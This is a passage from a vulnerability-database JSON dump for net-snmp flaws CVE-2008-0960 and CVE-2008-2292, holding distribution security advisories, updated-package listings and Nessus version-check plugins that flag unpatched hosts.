12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/net-snmp-5.4.1.2-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/net-snmp-5.4.1.2-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/net-snmp-5.4.1.2-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\ne5c916d2bf7a865d48547b727fc21d26 net-snmp-5.4.1.2-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n9e42a9a2aad1caffde814d4d5346b707 net-snmp-5.4.1.2-i486-1_slack12.1.tgz\n\nSlackware -current package:\n611ca8b6481ff2e9860f6ecff5e6367c net-snmp-5.4.1.2-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg net-snmp-5.4.1.2-i486-1_slack12.1.tgz", "modified": "2008-07-29T05:33:31", "published": "2008-07-29T05:33:31", "id": "SSA-2008-210-07", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.388995", "type": "slackware", "title": "[slackware-security] net-snmp", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "[5.3.1-24.1]\n- fix buffer overflow in perl module (CVE-2008-2292) (#449897)\n- fix SNMPv3 authentication checks (unknown CVE) (#449897)", "edition": 4, "modified": "2008-06-10T00:00:00", "published": "2008-06-10T00:00:00", "id": "ELSA-2008-0529", "href": "http://linux.oracle.com/errata/ELSA-2008-0529.html", "title": "net-snmp security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292"], "description": "SNMP (Simple Network Management Protocol) is a protocol used for network management. The NET-SNMP project includes various SNMP tools: an extensible agent, an SNMP library, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl mib browser. This package contains the snmpd and snmptrapd daemons, documentation, etc. You will probably also want to install the net-snmp-utils package, which contains NET-SNMP utilities. Building option: \t--without tcp_wrappers : disable tcp_wrappers support ", "modified": "2008-06-11T04:39:24", "published": "2008-06-11T04:39:24", "id": "FEDORA:M5B4JRGQ020084", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: net-snmp-5.4.1-18.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292"], "description": "SNMP (Simple Network Management Protocol) is a protocol used for network management. The NET-SNMP project includes various SNMP tools: an extensible agent, an SNMP library, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl mib browser. This package contains the snmpd and snmptrapd daemons, documentation, etc. You will probably also want to install the net-snmp-utils package, which contains NET-SNMP utilities. Building option: \t--without tcp_wrappers : disable tcp_wrappers support ", "modified": "2008-06-11T04:39:34", "published": "2008-06-11T04:39:34", "id": "FEDORA:M5B4MF2E020205", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: net-snmp-5.4.1-7.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292", "CVE-2008-4309"], "description": "SNMP (Simple Network Management Protocol) is a protocol used for network management. The NET-SNMP project includes various SNMP tools: an extensible agent, an SNMP library, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl mib browser. This package contains the snmpd and snmptrapd daemons, documentation, etc. You will probably also want to install the net-snmp-utils package, which contains NET-SNMP utilities. Building option: \t--without tcp_wrappers : disable tcp_wrappers support ", "modified": "2008-11-06T04:05:51", "published": "2008-11-06T04:05:51", "id": "FEDORA:182BE208D56", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: net-snmp-5.4.1-19.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292", "CVE-2008-4309"], "description": "SNMP (Simple Network Management Protocol) is a protocol used for network management. The NET-SNMP project includes various SNMP tools: an extensible agent, an SNMP library, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl mib browser. This package contains the snmpd and snmptrapd daemons, documentation, etc. You will probably also want to install the net-snmp-utils package, which contains NET-SNMP utilities. Building option: \t--without tcp_wrappers : disable tcp_wrappers support ", "modified": "2008-11-06T04:05:02", "published": "2008-11-06T04:05:02", "id": "FEDORA:DBD08208D71", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: net-snmp-5.4.1-8.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5846", "CVE-2008-0960", "CVE-2008-2292"], "description": "SNMP (Simple Network Management Protocol) is a protocol used for network management. The NET-SNMP project includes various SNMP tools: an extensible agent, an SNMP library, tools for requesting or setting information from SNMP agents, tools for generating and handling SNMP traps, a version of the netstat command which uses SNMP, and a Tk/Perl mib browser. This package contains the snmpd and snmptrapd daemons, documentation, etc. You will probably also want to install the net-snmp-utils package, which contains NET-SNMP utilities. Building option: \t--without tcp_wrappers : disable tcp_wrappers support ", "modified": "2008-06-11T04:39:52", "published": "2008-06-11T04:39:52", "id": "FEDORA:M5B4OQS6020259", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: net-snmp-5.4-18.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T14:46:30", "description": "This security update fixes a denial of service vulnerability and an\nauthentication bypass (CVE-2008-2292, CVE-2008-0960).", "edition": 24, "published": "2008-08-01T00:00:00", "title": "openSUSE 10 Security Update : libsnmp15 (libsnmp15-5418)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2008-08-01T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:perl-SNMP", "p-cpe:/a:novell:opensuse:net-snmp-devel", "p-cpe:/a:novell:opensuse:net-snmp", "p-cpe:/a:novell:opensuse:snmp-mibs", "p-cpe:/a:novell:opensuse:libsnmp15", "p-cpe:/a:novell:opensuse:net-snmp-32bit"], "id": "SUSE_LIBSNMP15-5418.NASL", "href": "https://www.tenable.com/plugins/nessus/33786", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libsnmp15-5418.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33786);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n\n script_name(english:\"openSUSE 10 Security Update : libsnmp15 (libsnmp15-5418)\");\n script_summary(english:\"Check for the libsnmp15-5418 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update fixes a denial of service vulnerability and an\nauthentication bypass (CVE-2008-2292, CVE-2008-0960).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libsnmp15 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsnmp15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:net-snmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-SNMP\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:snmp-mibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"net-snmp-5.4.rc2-8\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"net-snmp-devel-5.4.rc2-8\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"perl-SNMP-5.4.rc2-8\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"net-snmp-32bit-5.4.rc2-8\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"libsnmp15-5.4.1-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"net-snmp-5.4.1-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"net-snmp-devel-5.4.1-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"perl-SNMP-5.4.1-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"snmp-mibs-5.4.1-19.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", cpu:\"x86_64\", reference:\"net-snmp-32bit-5.4.1-19.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-snmp / net-snmp-32bit / net-snmp-devel / perl-SNMP / libsnmp15 / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:16", "description": "This security update of net-snmp fixes a denial of service\nvulnerability (CVE-2008-2292), an authentication bypass\n(CVE-2008-0960) and several memory leaks.\n\nIn addition net-snmp was patched to allow customization of the agent\naddress set.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : net-snmp (YOU Patch Number 12204)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12204.NASL", "href": "https://www.tenable.com/plugins/nessus/41223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41223);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n\n script_name(english:\"SuSE9 Security Update : net-snmp (YOU Patch Number 12204)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update of net-snmp fixes a denial of service\nvulnerability (CVE-2008-2292), an authentication bypass\n(CVE-2008-0960) and several memory leaks.\n\nIn addition net-snmp was patched to allow customization of the agent\naddress set.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0960.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2292.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12204.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"net-snmp-5.1.3.1-0.22\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"net-snmp-devel-5.1.3.1-0.22\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"perl-SNMP-5.1.3.1-0.22\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"net-snmp-32bit-9-200807112021\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:43:56", "description": "A flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : net-snmp on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080610_NET_SNMP_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60419", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60419);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n\n script_name(english:\"Scientific Linux Security Update : net-snmp on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way Net-SNMP checked an SNMPv3 packet's\nKeyed-Hash Message Authentication Code (HMAC). An attacker could use\nthis flaw to spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n\nA buffer overflow was found in the Perl bindings for Net-SNMP. This\ncould be exploited if an attacker could convince an application using\nthe Net-SNMP Perl module to connect to a malicious SNMP agent.\n(CVE-2008-2292)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0806&L=scientific-linux-errata&T=0&P=991\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?638c7a60\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"net-snmp-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"net-snmp-devel-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"net-snmp-libs-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"net-snmp-perl-5.0.9-2.30E.24\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"net-snmp-utils-5.0.9-2.30E.24\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"net-snmp-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"net-snmp-devel-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"net-snmp-libs-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"net-snmp-perl-5.1.2-11.el4_6.11.3\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"net-snmp-utils-5.1.2-11.el4_6.11.3\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"net-snmp-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"net-snmp-devel-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"net-snmp-libs-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"net-snmp-perl-5.3.1-24.el5_2.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"net-snmp-utils-5.3.1-24.el5_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:24", "description": "The remote host is affected by the vulnerability described in GLSA-200808-02\n(Net-SNMP: Multiple vulnerabilities)\n\n Wes Hardaker reported that the SNMPv3 HMAC verification relies on the\n client to specify the HMAC length (CVE-2008-0960). John Kortink\n reported a buffer overflow in the Perl bindings of Net-SNMP when\n processing the OCTETSTRING in an attribute value pair (AVP) received by\n an SNMP agent (CVE-2008-2292).\n \nImpact :\n\n An attacker could send SNMPv3 packets to an instance of snmpd providing\n a valid user name and an HMAC length value of 1, and easily conduct\n brute-force attacks to bypass SNMP authentication. An attacker could\n further entice a user to connect to a malicious SNMP agent with an SNMP\n client using the Perl bindings, possibly resulting in the execution of\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2008-08-07T00:00:00", "title": "GLSA-200808-02 : Net-SNMP: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "modified": "2008-08-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:net-snmp", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200808-02.NASL", "href": "https://www.tenable.com/plugins/nessus/33832", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200808-02.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33832);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_bugtraq_id(29212, 29623);\n script_xref(name:\"GLSA\", value:\"200808-02\");\n\n script_name(english:\"GLSA-200808-02 : Net-SNMP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200808-02\n(Net-SNMP: Multiple vulnerabilities)\n\n Wes Hardaker reported that the SNMPv3 HMAC verification relies on the\n client to specify the HMAC length (CVE-2008-0960). John Kortink\n reported a buffer overflow in the Perl bindings of Net-SNMP when\n processing the OCTETSTRING in an attribute value pair (AVP) received by\n an SNMP agent (CVE-2008-2292).\n \nImpact :\n\n An attacker could send SNMPv3 packets to an instance of snmpd providing\n a valid user name and an HMAC length value of 1, and easily conduct\n brute-force attacks to bypass SNMP authentication. An attacker could\n further entice a user to connect to a malicious SNMP agent with an SNMP\n client using the Perl bindings, possibly resulting in the execution of\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200808-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Net-SNMP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/net-snmp-5.4.1.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:net-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/net-snmp\", unaffected:make_list(\"ge 5.4.1.1\"), vulnerable:make_list(\"lt 5.4.1.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Net-SNMP\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:33", "description": " - Tue Jun 10 2008 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-7\n\n - fix various flaws (CVE-2008-2292 CVE-2008-0960)\n\n - Thu Feb 14 2008 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-6\n\n - fixing ipNetToMediaNetAddress to show IP address\n (#432780)\n\n - Thu Nov 15 2007 Jan Safranek <jsafranek at redhat.com>\n 5.4.1-5\n\n - added procps to build dependencies (#380321)\n\n - fix crash on reading xen interfaces (#386611)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-06-12T00:00:00", "title": "Fedora 8 : net-snmp-5.4.1-7.fc8 (2008-5218)", "type": "nessus", "bulletinFamily": 